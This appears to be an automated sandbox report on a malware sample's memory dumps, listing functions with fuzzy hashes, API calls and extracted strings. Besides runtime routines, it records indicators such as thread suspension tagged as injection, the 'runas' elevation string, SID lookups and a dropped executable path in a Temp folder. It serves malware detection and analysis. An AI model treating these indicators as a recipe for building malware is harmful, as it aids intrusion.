Opcode Fuzzy Hash: 4bde5da5e5dbcce2e0a1285307c4a11a159059c42a3cf97298c197df96f77a5f
Instruction Fuzzy Hash: 3F518C75B40304BBDB208BA4DC85FAABBB8FF08705F504065FA09E61D0D7B4A95ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0C2, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a7b51fe63f71c5fb9360b372688c505fa8c4554a19a8c5a04ca64ab73c15f0
Instruction ID: e0dc1646e145955180f4f3746c60af465fce0b62feefe3327d74ca83b1ab1251
Opcode Fuzzy Hash: c0a7b51fe63f71c5fb9360b372688c505fa8c4554a19a8c5a04ca64ab73c15f0
Instruction Fuzzy Hash: 0941A3B1905218AEDB209F69CC89AEABBB9EF45304F1442DEE41CD3211DB389E848F54

Uniqueness

Uniqueness Score: -1.00%

Function 0288B312, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a7b51fe63f71c5fb9360b372688c505fa8c4554a19a8c5a04ca64ab73c15f0
Instruction ID: 8265e908e9e3536fd351df626345c3df19a31726091cb68d9fa80748a35afadb
Opcode Fuzzy Hash: c0a7b51fe63f71c5fb9360b372688c505fa8c4554a19a8c5a04ca64ab73c15f0
Instruction Fuzzy Hash: 524174B980421DAFDF24EF69CC89AEAB7B9EF85304F1442D9E41DD3211DA359E848F50

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB2C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041CB70

Part of subcall function 0041C709: _free.LIBCMT ref: 0041C726
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C738
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C74A
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C75C
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C76E
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C780
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C792
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7A4
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7B6
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7C8
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7DA
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7EC
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7FE

_free.LIBCMT ref: 0041CB65

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000,00000000), ref: 00416629

_free.LIBCMT ref: 0041CB87
_free.LIBCMT ref: 0041CB9C
_free.LIBCMT ref: 0041CBA7
_free.LIBCMT ref: 0041CBC9
_free.LIBCMT ref: 0041CBDC
_free.LIBCMT ref: 0041CBEA
_free.LIBCMT ref: 0041CBF5
_free.LIBCMT ref: 0041CC2D
_free.LIBCMT ref: 0041CC34
_free.LIBCMT ref: 0041CC51
_free.LIBCMT ref: 0041CC69

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 510fba1adc7cf242a608785f5bd2dfa962a1d78a49c1a1ea65ee83b995477306
Instruction ID: 0484ab9a63c19d17e320508f5cd372c79f8c2d53bff1b031fa99baee02996404
Opcode Fuzzy Hash: 510fba1adc7cf242a608785f5bd2dfa962a1d78a49c1a1ea65ee83b995477306
Instruction Fuzzy Hash: 45314C716443009FEB21AA79EC86B97B3E9AF00315F11442BE458D6291DF39FCD0CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0288CD7C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0288CDC0

Part of subcall function 0288C959: _free.LIBCMT ref: 0288C976
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C988
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C99A
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C9AC
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C9BE
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C9D0
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C9E2
Part of subcall function 0288C959: _free.LIBCMT ref: 0288C9F4
Part of subcall function 0288C959: _free.LIBCMT ref: 0288CA06
Part of subcall function 0288C959: _free.LIBCMT ref: 0288CA18
Part of subcall function 0288C959: _free.LIBCMT ref: 0288CA2A
Part of subcall function 0288C959: _free.LIBCMT ref: 0288CA3C
Part of subcall function 0288C959: _free.LIBCMT ref: 0288CA4E

_free.LIBCMT ref: 0288CDB5

Part of subcall function 02886851: HeapFree.KERNEL32(00000000,00000000,?,0288594E), ref: 02886867
Part of subcall function 02886851: GetLastError.KERNEL32(?,?,0288594E), ref: 02886879

_free.LIBCMT ref: 0288CDD7
_free.LIBCMT ref: 0288CDEC
_free.LIBCMT ref: 0288CDF7
_free.LIBCMT ref: 0288CE19
_free.LIBCMT ref: 0288CE2C
_free.LIBCMT ref: 0288CE3A
_free.LIBCMT ref: 0288CE45
_free.LIBCMT ref: 0288CE7D
_free.LIBCMT ref: 0288CE84
_free.LIBCMT ref: 0288CEA1
_free.LIBCMT ref: 0288CEB9

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
Instruction ID: 5fd15648e1ab5e72bdeca8a41d8e8fe94090435d76e51b0fa28173f78e219399
Opcode Fuzzy Hash: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
Instruction Fuzzy Hash: 6E31163E6006059FEB29BB79D848B5A77EABF00354F10482AE49DD7594EF31E9808E21

Uniqueness

Uniqueness Score: -1.00%

Function 0288AA9A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 0288AD22

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: cbdbc7ccb3bc7d96a1afbaa3de7abe9f4ef0bf1d3a905154f8dd188e560e571f
Instruction ID: 8a86b01659cfd4e372953c54def3862a317839def2cb2326c83a2dd108b1252c
Opcode Fuzzy Hash: cbdbc7ccb3bc7d96a1afbaa3de7abe9f4ef0bf1d3a905154f8dd188e560e571f
Instruction Fuzzy Hash: 62C1D47DA042499FDB19FF98C880BADBBB2AF49314F04406AE549D73D1E770A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00416DDA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416DF0

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000,00000000), ref: 00416629

_free.LIBCMT ref: 00416DFC
_free.LIBCMT ref: 00416E07
_free.LIBCMT ref: 00416E12
_free.LIBCMT ref: 00416E1D
_free.LIBCMT ref: 00416E28
_free.LIBCMT ref: 00416E33
_free.LIBCMT ref: 00416E3E
_free.LIBCMT ref: 00416E49
_free.LIBCMT ref: 00416E57

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5be3f2622cb3345a613f4c2fa7f468d10245fa3face95f549194a8e45062f44b
Instruction ID: 9ac12997f409e09f284fb3084e283640f1bc5f5bb484a064226b56a85c72038b
Opcode Fuzzy Hash: 5be3f2622cb3345a613f4c2fa7f468d10245fa3face95f549194a8e45062f44b
Instruction Fuzzy Hash: FF219A76900108EFCB41EF95C841DDE7BB9FF08345F0141AAF9159B121EB36EA94CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0288702A, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02887040

Part of subcall function 02886851: HeapFree.KERNEL32(00000000,00000000,?,0288594E), ref: 02886867
Part of subcall function 02886851: GetLastError.KERNEL32(?,?,0288594E), ref: 02886879

_free.LIBCMT ref: 0288704C
_free.LIBCMT ref: 02887057
_free.LIBCMT ref: 02887062
_free.LIBCMT ref: 0288706D
_free.LIBCMT ref: 02887078
_free.LIBCMT ref: 02887083
_free.LIBCMT ref: 0288708E
_free.LIBCMT ref: 02887099
_free.LIBCMT ref: 028870A7

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
Instruction ID: aa77e61dc5853cd169aa9c9bca17b25eac2958a43535ec8da0f7fe394465a7d6
Opcode Fuzzy Hash: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
Instruction Fuzzy Hash: 5A217A7E900118AFCB41EF98C848DDE7BB9BF08340F51416AE959DB161EB31DA54CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0041A84A, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad66e8943fa78c6d083c962ba83e37d4f7103d4a28aa4d584fab6eb960699ff5
Instruction ID: 24c1fb8e07bb5d931e9e808705c566552b3b874c63d1b27013fbf30a24ce9d82
Opcode Fuzzy Hash: ad66e8943fa78c6d083c962ba83e37d4f7103d4a28aa4d584fab6eb960699ff5
Instruction Fuzzy Hash: 05C10970A092459FDF15DF99C881BEEBBB1AF49314F04405BE60497392D738ADD2CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A40, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00410A77
___except_validate_context_record.LIBVCRUNTIME ref: 00410A7F
_ValidateLocalCookies.LIBCMT ref: 00410B08
__IsNonwritableInCurrentImage.LIBCMT ref: 00410B33
_ValidateLocalCookies.LIBCMT ref: 00410B88

Strings

csm, xrefs: 00410BB1
csm, xrefs: 00410B1D

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: 0374d3287ff8e98bf96915b3599c46b5bfbd7a8cb00e27770b5443055aea2c94
Instruction ID: 1e29f4121bd5bb4e6d42b0bcf92c1ff488988dd6b5532fa52b85bb20cecc90e3
Opcode Fuzzy Hash: 0374d3287ff8e98bf96915b3599c46b5bfbd7a8cb00e27770b5443055aea2c94
Instruction Fuzzy Hash: 2D51B534A00209DFCF14DF59D840ADE7BB5AF44318F1481ABE8155B392D7B9E9C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF44, Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0041BF6E
_free.LIBCMT ref: 0041C047
_free.LIBCMT ref: 0041C074

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: e5ef303b17e5445967702d97c5cf96fdc922caed4dbafb9c2c7f51454f5a5aa5
Instruction ID: a7ab0755cdd5fcc2c1d94863c0793a6e5362be77a03ae0c127ee93c90d898f96
Opcode Fuzzy Hash: e5ef303b17e5445967702d97c5cf96fdc922caed4dbafb9c2c7f51454f5a5aa5
Instruction Fuzzy Hash: 6E5105709C4211AFDB20AFB58CC29FE7BA4AF05718F04416FE51097282EB3989C18B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0288C194, Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0288C1BE
_free.LIBCMT ref: 0288C297
_free.LIBCMT ref: 0288C2C4

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 77043633401ad202eb27ead07ccf0404420d1bb3c6a2c2d34e07e4cc7096c80c
Instruction ID: c7100a30a5a96ca91f5e9bce42c247897f9bbcd750ad9edf62a598f8d91a540d
Opcode Fuzzy Hash: 77043633401ad202eb27ead07ccf0404420d1bb3c6a2c2d34e07e4cc7096c80c
Instruction Fuzzy Hash: 5551137D904305AFDB28BFB88840A7D7BB9AF01718F08416FE918D7295EB318501CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0287E0A0, Relevance: 10.7, APIs: 7, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c56517dd895090e643acb167113c19b22469452de2e7bafd864c278f49b37f3
Instruction ID: 3688787ad4b3e180b89dd9a25e93dca55c99d2cf90126c9726dc3e03b9a282f7
Opcode Fuzzy Hash: 1c56517dd895090e643acb167113c19b22469452de2e7bafd864c278f49b37f3
Instruction Fuzzy Hash: 5C71A579A00208ABDB14EFA8CC59BEEBB76EF48314F500468F505E7190DB74A945CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 02871FF0, Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 02872032
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02872063
RtlAllocateHeap.NTDLL(00000000), ref: 02872071
RtlAllocateHeap.NTDLL(00000000), ref: 02872084
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 028720AE
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 028720C1
LocalFree.KERNEL32(00000000), ref: 02872172

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
String ID:
API String ID: 856199767-0
Opcode ID: 53bff0a5cc04d034eb43299dfdcefbf10297ba504fe1a999c5ed99c88bb9a1b6
Instruction ID: 96b336cd18f2a1a3bbda1b6fc2ff83fcfe473ebb0668fd804fea680e13968632
Opcode Fuzzy Hash: 53bff0a5cc04d034eb43299dfdcefbf10297ba504fe1a999c5ed99c88bb9a1b6
Instruction Fuzzy Hash: 0E516179E00209ABDB10DFA5CC89FAFBB7CFF44254F040569E905E3254DB709A058BB0

Uniqueness

Uniqueness Score: -1.00%

Function 004171AC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 00417203
ext-ms-, xrefs: 00417217

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: c84a2b77935eb924aed648b2b7d3e40140daa0546c7905651bd106588082a50c
Instruction ID: 8f1c6e0094c6d3538ac87aa352488e327211543a1813d1f44e39b21f902c1d22
Opcode Fuzzy Hash: c84a2b77935eb924aed648b2b7d3e40140daa0546c7905651bd106588082a50c
Instruction Fuzzy Hash: 3221F631A4D220E7CB314B649C80EDB36789F557A0B2101A2FD16A7391D678DD4286E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C8A8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0041C870: _free.LIBCMT ref: 0041C895

_free.LIBCMT ref: 0041C8F6

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000,00000000), ref: 00416629

_free.LIBCMT ref: 0041C901
_free.LIBCMT ref: 0041C90C
_free.LIBCMT ref: 0041C960
_free.LIBCMT ref: 0041C96B
_free.LIBCMT ref: 0041C976
_free.LIBCMT ref: 0041C981

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6cd0b8cb4d40afac903e53b7985856a57367b62d0dae06027e3d0fb788c86ede
Instruction ID: f2b93970fb6e2aef318e5f2c4523945811294bca4e2481cfb0b80df0a2661d87
Opcode Fuzzy Hash: 6cd0b8cb4d40afac903e53b7985856a57367b62d0dae06027e3d0fb788c86ede
Instruction Fuzzy Hash: D41172715D0704EAD920B7B2CCC7FCBB79D5F01705F40082EB299A6052EB39F5958698

Uniqueness

Uniqueness Score: -1.00%

Function 0288CAF8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0288CAC0: _free.LIBCMT ref: 0288CAE5

_free.LIBCMT ref: 0288CB46

Part of subcall function 02886851: HeapFree.KERNEL32(00000000,00000000,?,0288594E), ref: 02886867
Part of subcall function 02886851: GetLastError.KERNEL32(?,?,0288594E), ref: 02886879

_free.LIBCMT ref: 0288CB51
_free.LIBCMT ref: 0288CB5C
_free.LIBCMT ref: 0288CBB0
_free.LIBCMT ref: 0288CBBB
_free.LIBCMT ref: 0288CBC6
_free.LIBCMT ref: 0288CBD1

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction ID: 6ba69e7aae845daba96332f18304b3bab9a0e2996bc27fe26711b04e8f253720
Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction Fuzzy Hash: 461154BE540B18BED924F774DC85FCB779E6F04700F44082AA29EE6050DA75F5144F62

Uniqueness

Uniqueness Score: -1.00%

Function 02874930, Relevance: 9.5, APIs: 6, Instructions: 479COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,?), ref: 0287495E

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 1d4deb5c787956fddc4f347c5cb07c17d095a8bc24bd6f442e5162741a100a9d
Instruction ID: b58f4be5c53248a45f0b0ae56fb6afb7fbbcbbaa5d1d91aa78a28fc5ff1a2585
Opcode Fuzzy Hash: 1d4deb5c787956fddc4f347c5cb07c17d095a8bc24bd6f442e5162741a100a9d
Instruction Fuzzy Hash: ACF1F479E002099FDF14EFA8D884BEEBBBAEF44304F504158E505E7680D774AA46CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00418457, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00403D80,00000000), ref: 0041849F
__fassign.LIBCMT ref: 0041867E
__fassign.LIBCMT ref: 0041869B
WriteFile.KERNEL32(?,00403D80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004186E3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00418723
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004187CF

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 8d93eeb9984b9cfff8565e0c27fea2738b2eaafb5c4d3da342a423e23a2a0f18
Instruction ID: beb5861e4abce14f06dcd24397d210cd9645b43e00d7a8697286e935f53395e2
Opcode Fuzzy Hash: 8d93eeb9984b9cfff8565e0c27fea2738b2eaafb5c4d3da342a423e23a2a0f18
Instruction Fuzzy Hash: D0D18D75D002589FCB15CFA8C8809EEBBB5EF49314F28416EE865B7341DB34AD86CB58

Uniqueness

Uniqueness Score: -1.00%

Function 028886A7, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,02873FD0,00000000), ref: 028886EF
__fassign.LIBCMT ref: 028888CE
__fassign.LIBCMT ref: 028888EB
WriteFile.KERNEL32(?,02873FD0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02888933
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 02888973
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 02888A1F

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 014c0ca57a7f5ee54f09faee06ffa081625be87e0c998be8b9fc15fd1b627e94
Instruction ID: 6ea2d7985d8f921695761bfe23572b98590da969c9aad069595dca53c6c22e07
Opcode Fuzzy Hash: 014c0ca57a7f5ee54f09faee06ffa081625be87e0c998be8b9fc15fd1b627e94
Instruction Fuzzy Hash: 73D19C79D0025C9FCB25DFA8C980AEDBBB5BF48314F68416AE859FB241D730A906CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00410E44, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00410E3B,00410CA9,004105B7), ref: 00410E52
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00410E60
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00410E79
SetLastError.KERNEL32(00000000,00410E3B,00410CA9,004105B7), ref: 00410ECB

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction ID: fbdea789013a358475f0cb85031c656012928e6e563f3a8a68490c708a0442e9
Opcode Fuzzy Hash: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction Fuzzy Hash: 2B01FC336097115DE72427777D85AD72A68EB05779B20073FF514902F2EFAA4CC1514C

Uniqueness

Uniqueness Score: -1.00%

Function 02881094, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0288108B,02880EF9,02880807), ref: 028810A2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 028810B0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 028810C9
SetLastError.KERNEL32(00000000,0288108B,02880EF9,02880807), ref: 0288111B

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction ID: 262f5d3b982f444851531eb3ee80cdf6ba917e8a653dfa16ec854e6be94575a8
Opcode Fuzzy Hash: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
Instruction Fuzzy Hash: AC01473F6083119EE62837787C8DB366BA9FB00775720133AE51DD10F2EF2148039508

Uniqueness

Uniqueness Score: -1.00%

Function 02872AE0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0287F170: Concurrency::cancel_current_task.LIBCPMT ref: 0287F291

CreateThread.KERNEL32(00000000,00000000,00402820,00000000,00000000,00000000), ref: 02872B46
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 02872B53
SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02872B5A

Strings

runas, xrefs: 02872C9F
xC, xrefs: 02872AEF

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
String ID: runas$xC
API String ID: 1039963361-439871600
Opcode ID: d4cf045ba19d9c6865cc5dfdee45025c507b0f4f9c9fb13c2992c86fcc39e2c8
Instruction ID: d9a74e0d2101e32312b5f28d66d7956ebe1360abaebc4adf042d20012423eae6
Opcode Fuzzy Hash: d4cf045ba19d9c6865cc5dfdee45025c507b0f4f9c9fb13c2992c86fcc39e2c8
Instruction Fuzzy Hash: E8412239210248ABEB19DF38CC88B9D3B66EF95318F948218FD45C72D4C779D4C08B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041B498, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe, xrefs: 0041B49D

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
API String ID: 0-1917590862
Opcode ID: 9f0d3990cab99277f2c6efbf3b81b8cc250a3f84bd6af618d38e46a0f3d7b651
Instruction ID: a6d91d72e78203765ee6c05f39fb8ce87f556eb1b606fad4f5d0dc189e3d53dc
Opcode Fuzzy Hash: 9f0d3990cab99277f2c6efbf3b81b8cc250a3f84bd6af618d38e46a0f3d7b651
Instruction Fuzzy Hash: 7D21D471204205BF9B20AF668C84DEB776DEF0036D710852AF925C7251E738ED8187E9

Uniqueness

Uniqueness Score: -1.00%

Function 0288B6E8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe, xrefs: 0288B6ED

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
API String ID: 0-1917590862
Opcode ID: 2a20f0945f74be5de8b6f5bc5cd751e107f73d802e6577e5b18c26adb3dc7a47
Instruction ID: 7072ebe2dd278058486256ca3cfd413d4e28218978449eafff515d0ad116278d
Opcode Fuzzy Hash: 2a20f0945f74be5de8b6f5bc5cd751e107f73d802e6577e5b18c26adb3dc7a47
Instruction Fuzzy Hash: 89215E7D604619BF9B21BF658D80D6B77AEEF803A87108925F929D7150E731EC018B61

Uniqueness

Uniqueness Score: -1.00%

Function 00412C0B, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00412C4D

Strings

.com, xrefs: 00412C8D
.exe, xrefs: 00412C5A
.cmd, xrefs: 00412C6B
.bat, xrefs: 00412C7C

